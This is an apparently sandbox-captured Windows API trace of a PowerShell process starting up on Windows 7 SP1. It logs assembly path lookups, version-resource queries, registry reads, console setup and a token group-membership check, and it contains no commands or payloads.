	[0088.090] CoTaskMemAlloc (cb=0x24) returned 0x2740e0
	[0088.090] GetUserDefaultLocaleName (in: lpLocaleName=0x2740e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0088.090] CoTaskMemFree (pv=0x2740e0) 
	[0088.227] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0088.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.227] CoTaskMemFree (pv=0x215590) 
	[0088.229] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0088.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.229] CoTaskMemFree (pv=0x215590) 
	[0088.231] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0088.231] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.231] CoTaskMemFree (pv=0x215590) 
	[0088.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.317] SetErrorMode (uMode=0x1) returned 0x1
	[0088.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x13daf0 | out: lpFileInformation=0x13daf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0088.317] SetErrorMode (uMode=0x1) returned 0x1
	[0088.317] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x13dd60 | out: lpdwHandle=0x13dd60) returned 0x94c
	[0088.318] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d45588 | out: lpData=0x2d45588) returned 1
	[0088.319] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13dcd8, puLen=0x13dcd0 | out: lplpBuffer=0x13dcd8*=0x2d45624, puLen=0x13dcd0) returned 1
	[0088.319] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d45700, puLen=0x13dc40) returned 1
	[0088.319] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0088.319] CoTaskMemAlloc (cb=0x2e) returned 0x2785f0
	[0088.319] lstrcpyW (in: lpString1=0x2785f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0088.319] CoTaskMemFree (pv=0x2785f0) 
	[0088.319] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d45754, puLen=0x13dc40) returned 1
	[0088.319] lstrlenW (lpString="System.Management.Automation") returned 28
	[0088.320] CoTaskMemAlloc (cb=0x3c) returned 0x1b8d4d50
	[0088.320] lstrcpyW (in: lpString1=0x1b8d4d50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0088.320] CoTaskMemFree (pv=0x1b8d4d50) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d457b0, puLen=0x13dc40) returned 1
	[0088.320] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0088.320] CoTaskMemAlloc (cb=0x20) returned 0x27ead0
	[0088.320] lstrcpyW (in: lpString1=0x27ead0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0088.320] CoTaskMemFree (pv=0x27ead0) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d457f0, puLen=0x13dc40) returned 1
	[0088.320] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0088.320] CoTaskMemAlloc (cb=0x44) returned 0x1b8d4d50
	[0088.320] lstrcpyW (in: lpString1=0x1b8d4d50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0088.320] CoTaskMemFree (pv=0x1b8d4d50) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d45858, puLen=0x13dc40) returned 1
	[0088.320] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0088.320] CoTaskMemAlloc (cb=0x76) returned 0x1fdf00
	[0088.320] lstrcpyW (in: lpString1=0x1fdf00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0088.320] CoTaskMemFree (pv=0x1fdf00) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d458f4, puLen=0x13dc40) returned 1
	[0088.320] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0088.320] CoTaskMemAlloc (cb=0x44) returned 0x1b8d4d50
	[0088.320] lstrcpyW (in: lpString1=0x1b8d4d50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0088.320] CoTaskMemFree (pv=0x1b8d4d50) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d45958, puLen=0x13dc40) returned 1
	[0088.320] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0088.320] CoTaskMemAlloc (cb=0x58) returned 0x1b4c70
	[0088.320] lstrcpyW (in: lpString1=0x1b4c70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0088.320] CoTaskMemFree (pv=0x1b4c70) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d459d4, puLen=0x13dc40) returned 1
	[0088.320] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0088.320] CoTaskMemAlloc (cb=0x20) returned 0x27ead0
	[0088.320] lstrcpyW (in: lpString1=0x27ead0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0088.320] CoTaskMemFree (pv=0x27ead0) 
	[0088.320] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x2d4567c, puLen=0x13dc40) returned 1
	[0088.321] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0088.321] CoTaskMemAlloc (cb=0x66) returned 0x27c350
	[0088.321] lstrcpyW (in: lpString1=0x27c350, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0088.321] CoTaskMemFree (pv=0x27c350) 
	[0088.321] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x0, puLen=0x13dc40) returned 0
	[0088.321] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x0, puLen=0x13dc40) returned 0
	[0088.321] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x13dc48, puLen=0x13dc40 | out: lplpBuffer=0x13dc48*=0x0, puLen=0x13dc40) returned 0
	[0088.321] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13dc18, puLen=0x13dc10 | out: lplpBuffer=0x13dc18*=0x2d45624, puLen=0x13dc10) returned 1
	[0088.321] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0088.321] VerLanguageNameW (in: wLang=0x0, szLang=0x1f89c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0088.321] CoTaskMemFree (pv=0x1f89c0) 
	[0088.321] VerQueryValueW (in: pBlock=0x2d45588, lpSubBlock="\\", lplpBuffer=0x13dc68, puLen=0x13dc60 | out: lplpBuffer=0x13dc68*=0x2d455b0, puLen=0x13dc60) returned 1
	[0088.329] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0088.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.329] CoTaskMemFree (pv=0x215590) 
	[0088.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13db38 | out: phkResult=0x13db38*=0x308) returned 0x0
	[0088.344] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x13db28 | out: phkResult=0x13db28*=0x30c) returned 0x0
	[0088.344] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13dbb8 | out: phkResult=0x13dbb8*=0x310) returned 0x0
	[0088.348] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13dafc, lpData=0x0, lpcbData=0x13daf8*=0x0 | out: lpType=0x13dafc*=0x1, lpData=0x0, lpcbData=0x13daf8*=0x56) returned 0x0
	[0088.397] CoTaskMemAlloc (cb=0x5a) returned 0x27c2e0
	[0088.397] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13dacc, lpData=0x27c2e0, lpcbData=0x13dac8*=0x56 | out: lpType=0x13dacc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x13dac8*=0x56) returned 0x0
	[0088.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.427] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0088.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.427] CoTaskMemFree (pv=0x215590) 
	[0089.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0089.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0089.912] CoTaskMemAlloc (cb=0x104) returned 0x2156a0
	[0089.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2156a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.912] CoTaskMemFree (pv=0x2156a0) 
	[0089.913] CoTaskMemAlloc (cb=0x104) returned 0x2156a0
	[0089.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2156a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.913] CoTaskMemFree (pv=0x2156a0) 
	[0090.205] CoTaskMemAlloc (cb=0x104) returned 0x2156a0
	[0090.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2156a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.205] CoTaskMemFree (pv=0x2156a0) 
	[0090.208] CoTaskMemAlloc (cb=0x104) returned 0x2156a0
	[0090.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2156a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.208] CoTaskMemFree (pv=0x2156a0) 
	[0090.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0090.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0090.813] CoTaskMemAlloc (cb=0x104) returned 0x2156a0
	[0090.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2156a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.813] CoTaskMemFree (pv=0x2156a0) 
	[0090.816] CoTaskMemAlloc (cb=0x104) returned 0x2156a0
	[0090.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2156a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0090.817] CoTaskMemFree (pv=0x2156a0) 
	[0091.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0091.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0093.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0094.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0094.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0100.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.848] bsearch (_Key=0x13b070, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0107.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0107.870] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0107.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.870] CoTaskMemFree (pv=0x2158c0) 
	[0107.872] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0107.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.873] CoTaskMemFree (pv=0x2158c0) 
	[0107.873] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0107.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.873] CoTaskMemFree (pv=0x2158c0) 
	[0107.875] CoCreateGuid (in: pguid=0x13de58 | out: pguid=0x13de58*(Data1=0x75ace213, Data2=0x92b8, Data3=0x48ae, Data4=([0]=0x9e, [1]=0x40, [2]=0x9, [3]=0x56, [4]=0x67, [5]=0x2e, [6]=0x21, [7]=0x57))) returned 0x0
	[0108.620] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0108.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.620] CoTaskMemFree (pv=0x2158c0) 
	[0108.623] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0108.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.623] CoTaskMemFree (pv=0x2158c0) 
	[0108.942] CoTaskMemAlloc (cb=0x104) returned 0x2158c0
	[0108.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2158c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.942] CoTaskMemFree (pv=0x2158c0) 
	[0108.947] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0108.949] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x13db00 | out: lpConsoleScreenBufferInfo=0x13db00) returned 1
	[0108.953] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0108.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x13db00 | out: lpConsoleScreenBufferInfo=0x13db00) returned 1
	[0108.954] GetVersionExW (in: lpVersionInformation=0x13da90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x13da90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0108.956] GetCurrentProcess () returned 0xffffffffffffffff
	[0108.957] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x13db28 | out: TokenHandle=0x13db28*=0x324) returned 1
	[0108.961] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x13da48 | out: TokenInformation=0x0, ReturnLength=0x13da48) returned 0
	[0108.961] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c38c0
	[0108.961] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x1c38c0, TokenInformationLength=0x4, ReturnLength=0x13da48 | out: TokenInformation=0x1c38c0, ReturnLength=0x13da48) returned 1
	[0108.963] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x13dba8 | out: phNewToken=0x13dba8*=0x320) returned 1
	[0108.963] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x13da48 | out: TokenInformation=0x0, ReturnLength=0x13da48) returned 0
	[0108.963] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c38f0
	[0108.963] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x1c38f0, TokenInformationLength=0x4, ReturnLength=0x13da48 | out: TokenInformation=0x1c38f0, ReturnLength=0x13da48) returned 1
	[0108.964] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2e20330*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x13dbb8 | out: IsMember=0x13dbb8) returned 1
	[0108.964] CloseHandle (hObject=0x320) returned 1
